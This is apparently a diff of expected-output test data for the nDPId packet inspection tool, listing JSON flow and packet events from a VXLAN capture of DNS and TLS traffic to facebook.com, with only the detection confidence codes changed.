-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442645,"flow_last_seen":1639650442645,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1639650442645,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60887,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639650442645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":126,"pkt_l4_len":88,"thread_ts_msec":1639650442645,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbANAAABAEcnnwKgWBMCoFgXt1xK1AFhqBAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA6NbFAAEAR1uQKChQECAgICK2VADUAJoy+G88BAAABAAAAAAAACGZhY2Vib29rA2NvbQAAHAAB"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639650442682,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":142,"pkt_l4_len":104,"thread_ts_msec":1639650442682,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAfK8cAABAER37wKgWBcCoFgSrWhK1AGit0wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABK7zAAAHgRJVUICAgICgoUBAA1rZUANljckMaBgAABAAEAAAAACGZhY2Vib29rA2NvbQAAAQABwAwAAQABAAAAPQAEnfDgIw=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442682,"flow_last_seen":1639650442682,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639650442682,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":43866,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639650442711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":154,"pkt_l4_len":116,"thread_ts_msec":1639650442711,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAiK8kAABAER3nwKgWBcCoFgSrWhK1AHSt3wgAAAAABFcAHuppKm\/PZnpQqv+aCABFAABW18oAAHgRPK8ICAgICgoUBAA1rZUAQjV7G8+BgAABAAEAAAAACGZhY2Vib29rA2NvbQAAHAABwAwAHAABAAABLAAQKgMogPFlAIH6zrAMAAAl3g=="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639650442712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442712,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNKAABAEcnbwKgWBMCoFgXCYhK1AFoDcQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8c1FAAEAGK0kKChQEnfDgI7CqAbtGa9PfAAAAAKAC\/Vy6qgAAAgQFggQCCAr1DDJLAAAAAAEDAwc="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442712,"flow_last_seen":1639650442712,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442712,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":49762,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639650442720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442720,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq8mAABAER3\/wKgWBcCoFgTrRhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKrMyr8yRmvT4KAS\/\/+p5QAAAgQFcAQCCApu3xNF9QwySwEDAwg="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442720,"flow_last_seen":1639650442720,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442720,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":60230,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639650442721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAZgNLAABAEcniwKgWBMCoFgXCYhK1AFIDeQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA0c1JAAEAGK1AKChQEnfDgI7CqAbtGa9PgzMq\/M4AQAfvWagAAAQEICvUMMlRu3xNF"} 
00958{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639650442721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":434,"pkt_l4_len":396,"thread_ts_msec":1639650442721,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQABoANMAABAEcinwKgWBMCoFgXCYhK1AYwCPwgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAFuc1NAAEAGKhUKChQEnfDgI7CqAbtGa9PgzMq\/M4AYAfsRCQAAAQEICvUMMlRu3xNFFgMBATUBAAExAwPcWPn0A3m1eWVQI6wIeeeCbwEERXHekpXL79ewykXCYSB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06gA+EwITAxMBwCzAMACfzKnMqMyqwCvALwCewCTAKABrwCPAJwBnwArAFAA5wAnAEwAzAJ0AnAA9ADwANQAvAP8BAACqAAAAEQAPAAAMZmFjZWJvb2suY29tAAsABAMAAQIACgAMAAoAHQAXAB4AGQAYACMAAAAWAAAAFwAAAA0AMAAuBAMFAwYDCAcICAgJCAoICwgECAUIBgQBBQEGAQMDAgMDAQIBAwICAgQCBQIGAgArAAkIAwQDAwMCAwEALQACAQEAMwAmACQAHQAgvh2mgzmX9e9ai9f7D2sZdwM6XcPIdlu9U72vXq+2WUY="} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639650442730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":120,"pkt_l4_len":82,"thread_ts_msec":1639650442730,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAZq8oAABAER4FwKgWBcCoFgTrRhK1AFKtvQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA0NXJAAFcGUiid8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQXWHAAAAQEICm7fE0\/1DDJU"} 
02407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639650442731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1500,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1500,"pkt_l4_len":1462,"thread_ts_msec":1639650442731,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAFyq8pAABAERigwKgWBcCoFgTrRhK1BbazIQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAWYNXNAAFcGTMOd8OAjCgoUBAG7sKrMyr8zRmvVGoAQAQV3jwAAAQEICm7fE0\/1DDJUFgMDAHoCAAB2AwOmSfmdNeNm8QDTG24pPSbwgaHpKWVOEuxV0VdDoIbVRCB1jrx0W5zbrxLwk6GsjZfhJPYVrgSw3Zq6NCEkFAT06hMDAAAuACsAAgMEADMAJAAdACBeWCJdN6DYiyNoL9O4psA+bOwF3dlPVj+\/ZvCptenEWhQDAwABARcDAwP5x3wWkfPx0kKF78QldsrrAx9RhC9Bn0NSGlsi9mLXhXMxtjC1tRafSYFhQiJT+Fexnm8My4gs26aQEytaTPmgh5bUcw2QSfIZvydw4\/xZva+hLS\/8KA8IimnKia46hp3fWd34D\/kZeUEi4PChEE1dsSEooXjU12XznCQysKGXu4bNl\/M85AYOBz9YkdnIBAFMjv3LwRfyKzi+n+FzF2x2zQZe5zhiQO++hcg2a8zSiSl8WG4UQlAbxtYUcRtsHiuPhWa\/PFDmcr\/s5mD\/Q55l8WWg9PfvSz5AAtjdU+LwfzbipKrnitGs76ROINneUubu+vg3oG1HDHdCmIEKeQwpdQlOkFMa7Zj9p\/hnuj8kufGBHQWOnvQ4ESu9jqNCVadRhiLORyEnSmIOTVXq2PFZieMvXd\/iPGqx2LJGD35zc9E73bB1G1gUSAjqKKkF7Ka0QSqC60GRLch93kQOqKrg3ohzvWu6Nvcf1bKMMkwp3RH43UImPPvzJfBg0eF8coKNcZUeUHlo354awjbPVkVZdhktOsK2GP0UxCJQkEEIHy30I1R0Mi0YUyrXiupVR5oc885KczFIY6ZLchLSI9gBm4CPo74pczykPl0D2ohno9XIYd917oz\/CK6iDlxcZRoVCD9vR\/QBAVfogV5k0Bxag8nU0KkVlVrZu05e7Ga+la++aA\/ZRES1+kbfTcNkz+8wG0huQcFD9TuPucbrdbya+Lt4QerqgS6VIW4NcTKUEe7ooQN3x+GdEnHT5nA80FCh2Q8\/7Y4VrtbkIgXx1EFWygd\/V2e6bsr0FcvNp9dOQi4BilNsmBAYks4O62pQ+ID1+NsWsODEwCDgqelXXYi5V9R4vP0erUMDezq+wfpJUYzqIfZioJ\/y5HkwdUPno9YJNeESiKCDdm0vSVcq2riB8OcvQGo\/oDBJBq6nucF6sN73xA4p3ylMscy6Qt06wCWiIr6\/vtUxxidwqOW8p2ZSSzkMx7XwpulVjUmRTrg1+pvDcBMZhTG9kIWHEUpGufrn4DQ51+oLui2RUzj5RrrnkZPvUcP3Uuf14vSYq\/g7J4\/eWdbdU2KCbHvT9wEZhi+VqOcKwG4DrRCujjzD3M4n08F6YOy6Scb4ZllcNjr65M66+QJXPHl\/qHrvVforxHgyi32Tp\/UN7ndgWwvzaAOqXr7WczqRiqyo11sYjhK2i91KB3fKsvsBdhbBQICqoKnWoaqw5eT9wfklQ0THh3G6DwjYbN8EYkzO57
6Kr2zwXFUqs4v+YkPVQY1z03PbCmgHbLckVMef7zjCijTbA\/yVRubOrENRdj4UBJxaoYP5sU895ipoXgXM1lSoqdOIJN4We+WBWsDjj7BpFwMDBe2TZHfrkB8f5TtDXM+TM0HPoRHXGJ7oGDZRZy0uPUx3IAPv3pCX9H0HbaU\/LA95w76hakUfhlXm7Vn78btBVP3OOeAsZ62gfgCXMiiM0NNLeJLiobbCc5AckKUS9M9XcUF9gQ2jgSpnpqdmyjX9LeO5ci7XrBg6Kuj9ATfiiYj8xXQOq0KONbnADXTjSNP+mRm+X4ZdGhZQhoUs7+r9y6T3L6QaFdpvuhamDG3Y+2lgP0Oygwz31QjrgZ3kiDdVFWXvn4FweXAGyXb4\/RH2YOzcZO6qBDJPMp+Xq7rr"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639650442864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"thread_ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANpAABAEcm6wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbtAAEAR1tYKChQECAgICIBcADUAKoq80C4BAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAQ=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442864,"flow_last_seen":1639650442864,"flow_idle_time":200000,"flow_min_l4_payload_len":84,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1639650442864,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":60351,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639650442864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":130,"pkt_l4_len":92,"thread_ts_msec":1639650442864,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAcANqAABAEcm5wKgWBMCoFgXrvxK1AFxsGAgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA+NbxAAEAR1tUKChQECAgICIBcADUAKi+aKzYBAAABAAAAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAQ=="} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639650442902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":175,"pkt_l4_len":137,"thread_ts_msec":1639650442902,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAna9MAABAER2qwKgWBcCoFgTESxK1AImt9AgAAAAABFcAHuppKm\/PZnpQqv+aCABFCABrklQAAHgRgggICAgICgoUBAA1gFwAV2EE0C6BgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAClEAEQlzdGFyLW1pbmkEYzEwcsAQwC4AAQABAAAAEQAEnfDgIw=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442902,"flow_last_seen":1639650442902,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1639650442902,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":50251,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639650442930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":187,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":187,"pkt_l4_len":149,"thread_ts_msec":1639650442930,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAqa9SAABAER2YwKgWBcCoFgTESxK1AJWuAAgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAB3WtIAAHgRuX4ICAgICgoUBAA1gFwAY6QKKzaBgAABAAIAAAAAA3d3dwhmYWNlYm9vawNjb20AABwAAcAMAAUAAQAACnkAEQlzdGFyLW1pbmkEYzEwcsAQwC4AHAABAAAAPAAQKgMogPFlAIH6zrAMAAAl3g=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639650442931,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442931,"pkt":"AAy9Bjp0AAy9Bjp1gQAABQgARQAAbgNuAABAEcm3wKgWBMCoFgWexhK1AFonDQgAAAAABFcAZnpQqv+aHuppKm\/PCABFAAA8KWlAAEAGdTEKChQEnfDgI7CsAbtx7JCPAAAAAKAC\/VzRnAAAAgQFggQCCAr1DDMmAAAAAAEDAwc="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442931,"flow_last_seen":1639650442931,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442931,"l3_proto":"ip4","src_ip":"192.168.22.4","dst_ip":"192.168.22.5","src_port":40646,"dst_port":4789,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"VXLAN","breed":"Acceptable","category":"Network"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639650442941,"flow_last_seen":1639650442941,"flow_idle_time":200000,"flow_min_l4_payload_len":82,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":82,"midstream":0,"thread_ts_msec":1639650442941,"l3_proto":"ip4","src_ip":"192.168.22.5","dst_ip":"192.168.22.4","src_port":36286,"dst_port":4789,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"vxlan.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1639650442941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":128,"pkt_l4_len":90,"thread_ts_msec":1639650442941,"pkt":"AAy9Bjp1AAy9Bjp0gQAABQgARQAAbq9VAABAER3QwKgWBcCoFgSNvhK1AFqtxQgAAAAABFcAHuppKm\/PZnpQqv+aCABFCAA8AABAAFcGh5Kd8OAjCgoUBAG7sKwSxDYyceyQkKAS\/\/\/6FgAAAgQFcAQCCAo3WVST9QwzJgEDAwg="} 